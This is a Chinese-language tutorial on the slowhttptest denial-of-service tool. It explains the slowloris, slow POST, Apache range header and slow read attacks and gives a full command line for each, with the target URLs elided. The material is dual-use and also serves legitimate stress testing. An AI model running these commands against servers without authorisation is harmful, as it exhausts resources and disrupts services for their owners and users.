慢速DoS攻击工具slowhttptest(网站压力测试工具)
slowhttptest
低带宽的应用层的慢速DoS工具,即通过与目标服务器保持长期的连接,从而将目标服务器的资源耗尽,达到DoS攻击的目的
安装方法
kali中直接安装即可:sudo apt-get install slowhttptest
使用方法
安装完成后,可以先使用slowhttptest -h 命令查看一下参数的解释和使用
如:slowhttptest -c 5000 -u http://...
-c:target number of connections
-u:absolute URL of target(注意:表示目标地址,需要加上http://协议标准)
四种攻击模式
- slowloris
- show HTTP POST
- Apache range header
- slow read
1. slowloris(默认为slowloris模式)
攻击原理:正常完整的http请求是以\r\n\r\n结尾的,但是slowloris只发送\r\n,导致目标服务器认为请求还未发送完成,一直等待直到超时
slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://... -x 24 -p 3
2. slow HTTP POST
攻击原理:和slowloris类似,都是利用了http请求头,不过slow http post是利用了Content-Length这个参数,声明一个很大的Content-Length,导致body部分发送缓慢,服务器便会一直等待
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://... -x 10 -p 3
3. Apache range header
攻击原理:攻击者向目标服务器传输一个很大的文件,体积超过Body大小限制进行分段,从而耗尽服务器的CPU和内存资源
slowhttptest -R -u http://... -t HEAD -c 1000 -a 10 -b 3000 -r 500
4. slow read attack
攻击原理:向目标服务器发送一个请求,请求一个很大的文件,但是慢速读取响应数据,使得文件长期滞留于目标服务器中,耗尽资源,通过调整TCP窗口大小(很小),使目标服务器慢速返回数据
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://... -p 3
Tip:以上命令中,详细的参数信息可以利用-h命令进行查看